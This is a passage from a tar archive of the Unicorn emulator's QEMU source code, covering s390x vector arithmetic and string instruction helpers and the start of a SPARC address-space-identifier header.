\ } DEF_VAVGL(8) DEF_VAVGL(16) #define DEF_VCLZ(BITS) \ void HELPER(gvec_vclz##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, clz32(a) - 32 + BITS); \ } \ } DEF_VCLZ(8) DEF_VCLZ(16) #define DEF_VCTZ(BITS) \ void HELPER(gvec_vctz##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, a ? ctz32(a) : BITS); \ } \ } DEF_VCTZ(8) DEF_VCTZ(16) /* like binary multiplication, but XOR instead of addition */ #define DEF_GALOIS_MULTIPLY(BITS, TBITS) \ static uint##TBITS##_t galois_multiply##BITS(uint##TBITS##_t a, \ uint##TBITS##_t b) \ { \ uint##TBITS##_t res = 0; \ \ while (b) { \ if (b & 0x1) { \ res = res ^ a; \ } \ a = a << 1; \ b = b >> 1; \ } \ return res; \ } DEF_GALOIS_MULTIPLY(8, 16) DEF_GALOIS_MULTIPLY(16, 32) DEF_GALOIS_MULTIPLY(32, 64) static S390Vector galois_multiply64(uint64_t a, uint64_t b) { S390Vector res = { 0 }; S390Vector va = { .doubleword[1] = a, }; S390Vector vb = { .doubleword[1] = b, }; while (!s390_vec_is_zero(&vb)) { if (vb.doubleword[1] & 0x1) { s390_vec_xor(&res, &res, &va); } s390_vec_shl(&va, &va, 1); s390_vec_shr(&vb, &vb, 1); } return res; } #define DEF_VGFM(BITS, TBITS) \ void HELPER(gvec_vgfm##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t a = s390_vec_read_element##BITS(v2, i * 2); \ uint##BITS##_t b = s390_vec_read_element##BITS(v3, i * 2); \ uint##TBITS##_t d = galois_multiply##BITS(a, b); \ \ a = s390_vec_read_element##BITS(v2, i * 2 + 1); \ b = s390_vec_read_element##BITS(v3, i * 2 + 1); \ d = d ^ galois_multiply32(a, b); \ s390_vec_write_element##TBITS(v1, i, d); \ } \ } DEF_VGFM(8, 16) DEF_VGFM(16, 32) DEF_VGFM(32, 64) void HELPER(gvec_vgfm64)(void *v1, const void *v2, const void *v3, uint32_t desc) { S390Vector tmp1, tmp2; uint64_t a, b; a = s390_vec_read_element64(v2, 0); b = s390_vec_read_element64(v3, 0); tmp1 = galois_multiply64(a, b); a = s390_vec_read_element64(v2, 1); b = s390_vec_read_element64(v3, 1); tmp2 = galois_multiply64(a, b); s390_vec_xor(v1, &tmp1, &tmp2); } #define DEF_VGFMA(BITS, TBITS) \ void HELPER(gvec_vgfma##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t a = s390_vec_read_element##BITS(v2, i * 2); \ uint##BITS##_t b = s390_vec_read_element##BITS(v3, i * 2); \ uint##TBITS##_t d = galois_multiply##BITS(a, b); \ \ a = s390_vec_read_element##BITS(v2, i * 2 + 1); \ b = s390_vec_read_element##BITS(v3, i * 2 + 1); \ d = d ^ galois_multiply32(a, b); \ d = d ^ s390_vec_read_element##TBITS(v4, i); \ s390_vec_write_element##TBITS(v1, i, d); \ } \ } DEF_VGFMA(8, 16) DEF_VGFMA(16, 32) DEF_VGFMA(32, 64) void HELPER(gvec_vgfma64)(void *v1, const void *v2, const void *v3, const void *v4, uint32_t desc) { S390Vector tmp1, tmp2; uint64_t a, b; a = s390_vec_read_element64(v2, 0); b = s390_vec_read_element64(v3, 0); tmp1 = galois_multiply64(a, b); a = s390_vec_read_element64(v2, 1); b = s390_vec_read_element64(v3, 1); tmp2 = galois_multiply64(a, b); s390_vec_xor(&tmp1, &tmp1, &tmp2); s390_vec_xor(v1, &tmp1, v4); } #define DEF_VMAL(BITS) \ void HELPER(gvec_vmal##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t c = s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, a * b + c); \ } \ } DEF_VMAL(8) DEF_VMAL(16) #define DEF_VMAH(BITS) \ void HELPER(gvec_vmah##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ const int32_t c = (int##BITS##_t)s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b + c) >> BITS); \ } \ } DEF_VMAH(8) DEF_VMAH(16) #define DEF_VMALH(BITS) \ void HELPER(gvec_vmalh##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t c = s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b + c) >> BITS); \ } \ } DEF_VMALH(8) DEF_VMALH(16) #define DEF_VMAE(BITS, TBITS) \ void HELPER(gvec_vmae##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ int##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMAE(8, 16) DEF_VMAE(16, 32) DEF_VMAE(32, 64) #define DEF_VMALE(BITS, TBITS) \ void HELPER(gvec_vmale##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ uint##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMALE(8, 16) DEF_VMALE(16, 32) DEF_VMALE(32, 64) #define DEF_VMAO(BITS, TBITS) \ void HELPER(gvec_vmao##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ int##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMAO(8, 16) DEF_VMAO(16, 32) DEF_VMAO(32, 64) #define DEF_VMALO(BITS, TBITS) \ void HELPER(gvec_vmalo##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ uint##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMALO(8, 16) DEF_VMALO(16, 32) DEF_VMALO(32, 64) #define DEF_VMH(BITS) \ void HELPER(gvec_vmh##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b) >> BITS); \ } \ } DEF_VMH(8) DEF_VMH(16) #define DEF_VMLH(BITS) \ void HELPER(gvec_vmlh##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b) >> BITS); \ } \ } DEF_VMLH(8) DEF_VMLH(16) #define DEF_VME(BITS, TBITS) \ void HELPER(gvec_vme##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VME(8, 16) DEF_VME(16, 32) DEF_VME(32, 64) #define DEF_VMLE(BITS, TBITS) \ void HELPER(gvec_vmle##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ const uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ const uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMLE(8, 16) DEF_VMLE(16, 32) DEF_VMLE(32, 64) #define DEF_VMO(BITS, TBITS) \ void HELPER(gvec_vmo##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMO(8, 16) DEF_VMO(16, 32) DEF_VMO(32, 64) #define DEF_VMLO(BITS, TBITS) \ void HELPER(gvec_vmlo##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ const uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ const uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMLO(8, 16) DEF_VMLO(16, 32) DEF_VMLO(32, 64) #define DEF_VPOPCT(BITS) \ void HELPER(gvec_vpopct##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, ctpop32(a)); \ } \ } DEF_VPOPCT(8) DEF_VPOPCT(16) #define DEF_VERLLV(BITS) \ void HELPER(gvec_verllv##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, rol##BITS(a, b)); \ } \ } DEF_VERLLV(8) DEF_VERLLV(16) #define DEF_VERLL(BITS) \ void HELPER(gvec_verll##BITS)(void *v1, const void *v2, uint64_t count, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, rol##BITS(a, count)); \ } \ } DEF_VERLL(8) DEF_VERLL(16) #define DEF_VERIM(BITS) \ void HELPER(gvec_verim##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const uint8_t count = simd_data(desc); \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v1, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t mask = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t d = (a & ~mask) | (rol##BITS(b, count) & mask); \ \ s390_vec_write_element##BITS(v1, i, d); \ } \ } DEF_VERIM(8) DEF_VERIM(16) void HELPER(gvec_vsl)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_shl(v1, v2, count); } void HELPER(gvec_vsra)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_sar(v1, v2, count); } void HELPER(gvec_vsrl)(void *v1, const void *v2, uint64_t count, uint32_t desc) { s390_vec_shr(v1, v2, count); } #define DEF_VSCBI(BITS) \ void HELPER(gvec_vscbi##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, a >= b); \ } \ } DEF_VSCBI(8) DEF_VSCBI(16) void HELPER(gvec_vtm)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { S390Vector tmp; s390_vec_and(&tmp, v1, v2); if (s390_vec_is_zero(&tmp)) { /* Selected bits all zeros; or all mask bits zero */ env->cc_op = 0; } else if (s390_vec_equal(&tmp, v2)) { /* Selected bits all ones */ env->cc_op = 3; } else { /* Selected bits a mix of zeros and ones */ env->cc_op = 1; } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/vec_string_helper.c�������������������������������������������������0000664�0000000�0000000�00000041744�14675241067�0022207�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector string instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg/tcg.h" #include "tcg/tcg-gvec-desc.h" #include "exec/helper-proto.h" /* * Returns a bit set in the MSB of each element that is zero, * as defined by the mask. */ static inline uint64_t zero_search(uint64_t a, uint64_t mask) { return ~(((a & mask) + mask) | a | mask); } /* * Returns a bit set in the MSB of each element that is not zero, * as defined by the mask. */ static inline uint64_t nonzero_search(uint64_t a, uint64_t mask) { return (((a & mask) + mask) | a) & ~mask; } /* * Returns the byte offset for the first match, or 16 for no match. */ static inline int match_index(uint64_t c0, uint64_t c1) { return (c0 ? clz64(c0) : clz64(c1) + 64) >> 3; } /* * Returns the number of bits composing one element. */ static uint8_t get_element_bits(uint8_t es) { return (1 << es) * BITS_PER_BYTE; } /* * Returns the bitmask for a single element. */ static uint64_t get_single_element_mask(uint8_t es) { return -1ull >> (64 - get_element_bits(es)); } /* * Returns the bitmask for a single element (excluding the MSB). */ static uint64_t get_single_element_lsbs_mask(uint8_t es) { return -1ull >> (65 - get_element_bits(es)); } /* * Returns the bitmasks for multiple elements (excluding the MSBs). */ static uint64_t get_element_lsbs_mask(uint8_t es) { return dup_const(es, get_single_element_lsbs_mask(es)); } static int vfae(void *v1, const void *v2, const void *v3, bool in, bool rt, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); const int bits = get_element_bits(es); uint64_t a0, a1, b0, b1, e0, e1, t0, t1, z0, z1; uint64_t first_zero = 16; uint64_t first_equal; int i; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = 0; e1 = 0; /* compare against equality with every other element */ for (i = 0; i < 64; i += bits) { t0 = rol64(b0, i); t1 = rol64(b1, i); e0 |= zero_search(a0 ^ t0, mask); e0 |= zero_search(a0 ^ t1, mask); e1 |= zero_search(a1 ^ t0, mask); e1 |= zero_search(a1 ^ t1, mask); } /* invert the result if requested - invert only the MSBs */ if (in) { e0 = ~e0 & ~mask; e1 = ~e1 & ~mask; } first_equal = match_index(e0, e1); if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } if (rt) { e0 = (e0 >> (bits - 1)) * get_single_element_mask(es); e1 = (e1 >> (bits - 1)) * get_single_element_mask(es); s390_vec_write_element64(v1, 0, e0); s390_vec_write_element64(v1, 1, e1); } else { s390_vec_write_element64(v1, 0, MIN(first_equal, first_zero)); s390_vec_write_element64(v1, 1, 0); } if (first_zero == 16 && first_equal == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_equal < first_zero) { return 2; /* matching elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VFAE_HELPER(BITS) \ void HELPER(gvec_vfae##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool rt = extract32(simd_data(desc), 2, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfae(v1, v2, v3, in, rt, zs, MO_##BITS); \ } DEF_VFAE_HELPER(8) DEF_VFAE_HELPER(16) DEF_VFAE_HELPER(32) #define DEF_VFAE_CC_HELPER(BITS) \ void HELPER(gvec_vfae_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool rt = extract32(simd_data(desc), 2, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfae(v1, v2, v3, in, rt, zs, MO_##BITS); \ } DEF_VFAE_CC_HELPER(8) DEF_VFAE_CC_HELPER(16) DEF_VFAE_CC_HELPER(32) static int vfee(void *v1, const void *v2, const void *v3, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0, a1, b0, b1, e0, e1, z0, z1; uint64_t first_zero = 16; uint64_t first_equal; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = zero_search(a0 ^ b0, mask); e1 = zero_search(a1 ^ b1, mask); first_equal = match_index(e0, e1); if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } s390_vec_write_element64(v1, 0, MIN(first_equal, first_zero)); s390_vec_write_element64(v1, 1, 0); if (first_zero == 16 && first_equal == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_equal < first_zero) { return 2; /* matching elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VFEE_HELPER(BITS) \ void HELPER(gvec_vfee##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfee(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFEE_HELPER(8) DEF_VFEE_HELPER(16) DEF_VFEE_HELPER(32) #define DEF_VFEE_CC_HELPER(BITS) \ void HELPER(gvec_vfee_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfee(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFEE_CC_HELPER(8) DEF_VFEE_CC_HELPER(16) DEF_VFEE_CC_HELPER(32) static int vfene(void *v1, const void *v2, const void *v3, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0, a1, b0, b1, e0, e1, z0, z1; uint64_t first_zero = 16; uint64_t first_inequal; bool smaller = false; a0 = s390_vec_read_element64(v2, 0); a1 = s390_vec_read_element64(v2, 1); b0 = s390_vec_read_element64(v3, 0); b1 = s390_vec_read_element64(v3, 1); e0 = nonzero_search(a0 ^ b0, mask); e1 = nonzero_search(a1 ^ b1, mask); first_inequal = match_index(e0, e1); /* identify the smaller element */ if (first_inequal < 16) { uint8_t enr = first_inequal / (1 << es); uint32_t a = s390_vec_read_element(v2, enr, es); uint32_t b = s390_vec_read_element(v3, enr, es); smaller = a < b; } if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } s390_vec_write_element64(v1, 0, MIN(first_inequal, first_zero)); s390_vec_write_element64(v1, 1, 0); if (first_zero == 16 && first_inequal == 16) { return 3; } else if (first_zero < first_inequal) { return 0; } return smaller ? 1 : 2; } #define DEF_VFENE_HELPER(BITS) \ void HELPER(gvec_vfene##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vfene(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFENE_HELPER(8) DEF_VFENE_HELPER(16) DEF_VFENE_HELPER(32) #define DEF_VFENE_CC_HELPER(BITS) \ void HELPER(gvec_vfene_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vfene(v1, v2, v3, zs, MO_##BITS); \ } DEF_VFENE_CC_HELPER(8) DEF_VFENE_CC_HELPER(16) DEF_VFENE_CC_HELPER(32) static int vistr(void *v1, const void *v2, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0 = s390_vec_read_element64(v2, 0); uint64_t a1 = s390_vec_read_element64(v2, 1); uint64_t z; int cc = 3; z = zero_search(a0, mask); if (z) { a0 &= ~(-1ull >> clz64(z)); a1 = 0; cc = 0; } else { z = zero_search(a1, mask); if (z) { a1 &= ~(-1ull >> clz64(z)); cc = 0; } } s390_vec_write_element64(v1, 0, a0); s390_vec_write_element64(v1, 1, a1); return cc; } #define DEF_VISTR_HELPER(BITS) \ void HELPER(gvec_vistr##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ vistr(v1, v2, MO_##BITS); \ } DEF_VISTR_HELPER(8) DEF_VISTR_HELPER(16) DEF_VISTR_HELPER(32) #define DEF_VISTR_CC_HELPER(BITS) \ void HELPER(gvec_vistr_cc##BITS)(void *v1, const void *v2, CPUS390XState *env, \ uint32_t desc) \ { \ env->cc_op = vistr(v1, v2, MO_##BITS); \ } DEF_VISTR_CC_HELPER(8) DEF_VISTR_CC_HELPER(16) DEF_VISTR_CC_HELPER(32) static bool element_compare(uint32_t data, uint32_t l, uint8_t c) { const bool equal = extract32(c, 7, 1); const bool lower = extract32(c, 6, 1); const bool higher = extract32(c, 5, 1); if (data < l) { return lower; } else if (data > l) { return higher; } return equal; } static int vstrc(void *v1, const void *v2, const void *v3, const void *v4, bool in, bool rt, bool zs, uint8_t es) { const uint64_t mask = get_element_lsbs_mask(es); uint64_t a0 = s390_vec_read_element64(v2, 0); uint64_t a1 = s390_vec_read_element64(v2, 1); int first_zero = 16, first_match = 16; S390Vector rt_result = { 0 }; uint64_t z0, z1; int i, j; if (zs) { z0 = zero_search(a0, mask); z1 = zero_search(a1, mask); first_zero = match_index(z0, z1); } for (i = 0; i < 16 / (1 << es); i++) { const uint32_t data = s390_vec_read_element(v2, i, es); const int cur_byte = i * (1 << es); bool any_match = false; /* if we don't need a bit vector, we can stop early */ if (cur_byte == first_zero && !rt) { break; } for (j = 0; j < 16 / (1 << es); j += 2) { const uint32_t l1 = s390_vec_read_element(v3, j, es); const uint32_t l2 = s390_vec_read_element(v3, j + 1, es); /* we are only interested in the highest byte of each element */ const uint8_t c1 = s390_vec_read_element8(v4, j * (1 << es)); const uint8_t c2 = s390_vec_read_element8(v4, (j + 1) * (1 << es)); if (element_compare(data, l1, c1) && element_compare(data, l2, c2)) { any_match = true; break; } } /* invert the result if requested */ any_match = in ^ any_match; if (any_match) { /* indicate bit vector if requested */ if (rt) { const uint64_t val = -1ull; first_match = MIN(cur_byte, first_match); s390_vec_write_element(&rt_result, i, es, val); } else { /* stop on the first match */ first_match = cur_byte; break; } } } if (rt) { *(S390Vector *)v1 = rt_result; } else { s390_vec_write_element64(v1, 0, MIN(first_match, first_zero)); s390_vec_write_element64(v1, 1, 0); } if (first_zero == 16 && first_match == 16) { return 3; /* no match */ } else if (first_zero == 16) { return 1; /* matching elements, no match for zero */ } else if (first_match < first_zero) { return 2; /* matching elements before match for zero */ } return 0; /* match for zero */ } #define DEF_VSTRC_HELPER(BITS) \ void HELPER(gvec_vstrc##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vstrc(v1, v2, v3, v4, in, 0, zs, MO_##BITS); \ } DEF_VSTRC_HELPER(8) DEF_VSTRC_HELPER(16) DEF_VSTRC_HELPER(32) #define DEF_VSTRC_RT_HELPER(BITS) \ void HELPER(gvec_vstrc_rt##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ vstrc(v1, v2, v3, v4, in, 1, zs, MO_##BITS); \ } DEF_VSTRC_RT_HELPER(8) DEF_VSTRC_RT_HELPER(16) DEF_VSTRC_RT_HELPER(32) #define DEF_VSTRC_CC_HELPER(BITS) \ void HELPER(gvec_vstrc_cc##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, CPUS390XState *env, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vstrc(v1, v2, v3, v4, in, 0, zs, MO_##BITS); \ } DEF_VSTRC_CC_HELPER(8) DEF_VSTRC_CC_HELPER(16) DEF_VSTRC_CC_HELPER(32) #define DEF_VSTRC_CC_RT_HELPER(BITS) \ void HELPER(gvec_vstrc_cc_rt##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, CPUS390XState *env, \ uint32_t desc) \ { \ const bool in = extract32(simd_data(desc), 3, 1); \ const bool zs = extract32(simd_data(desc), 1, 1); \ \ env->cc_op = vstrc(v1, v2, v3, v4, in, 1, zs, MO_##BITS); \ } DEF_VSTRC_CC_RT_HELPER(8) DEF_VSTRC_CC_RT_HELPER(16) DEF_VSTRC_CC_RT_HELPER(32) ����������������������������unicorn-2.1.1/qemu/target/sparc/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016551�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/asi.h���������������������������������������������������������������0000664�0000000�0000000�00000037606�14675241067�0017512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef SPARC_ASI_H #define SPARC_ASI_H /* asi.h: Address Space Identifier values for the sparc. * * Copyright (C) 1995,1996 David S. Miller (davem@caip.rutgers.edu) * * Pioneer work for sun4m: Paul Hatchman (paul@sfe.com.au) * Joint edition for sun4c+sun4m: Pete A. Zaitcev <zaitcev@ipmce.su> */ /* The first batch are for the sun4c. */ #define ASI_NULL1 0x00 #define ASI_NULL2 0x01 /* sun4c and sun4 control registers and mmu/vac ops */ #define ASI_CONTROL 0x02 #define ASI_SEGMAP 0x03 #define ASI_PTE 0x04 #define ASI_HWFLUSHSEG 0x05 #define ASI_HWFLUSHPAGE 0x06 #define ASI_REGMAP 0x06 #define ASI_HWFLUSHCONTEXT 0x07 #define ASI_USERTXT 0x08 #define ASI_KERNELTXT 0x09 #define ASI_USERDATA 0x0a #define ASI_KERNELDATA 0x0b /* VAC Cache flushing on sun4c and sun4 */ #define ASI_FLUSHSEG 0x0c #define ASI_FLUSHPG 0x0d #define ASI_FLUSHCTX 0x0e /* SPARCstation-5: only 6 bits are decoded. */ /* wo = Write Only, rw = Read Write; */ /* ss = Single Size, as = All Sizes; */ #define ASI_M_RES00 0x00 /* Don't touch... */ #define ASI_M_UNA01 0x01 /* Same here... */ #define ASI_M_MXCC 0x02 /* Access to TI VIKING MXCC registers */ #define ASI_M_FLUSH_PROBE 0x03 /* Reference MMU Flush/Probe; rw, ss */ #define ASI_M_MMUREGS 0x04 /* MMU Registers; rw, ss */ #define ASI_M_TLBDIAG 0x05 /* MMU TLB only Diagnostics */ #define ASI_M_DIAGS 0x06 /* Reference MMU Diagnostics */ #define ASI_M_IODIAG 0x07 /* MMU I/O TLB only Diagnostics */ #define ASI_M_USERTXT 0x08 /* Same as ASI_USERTXT; rw, as */ #define ASI_M_KERNELTXT 0x09 /* Same as ASI_KERNELTXT; rw, as */ #define ASI_M_USERDATA 0x0A /* Same as ASI_USERDATA; rw, as */ #define ASI_M_KERNELDATA 0x0B /* Same as ASI_KERNELDATA; rw, as */ #define ASI_M_TXTC_TAG 0x0C /* Instruction Cache Tag; rw, ss */ #define ASI_M_TXTC_DATA 0x0D /* Instruction Cache Data; rw, ss */ #define ASI_M_DATAC_TAG 0x0E /* Data Cache Tag; rw, ss */ #define ASI_M_DATAC_DATA 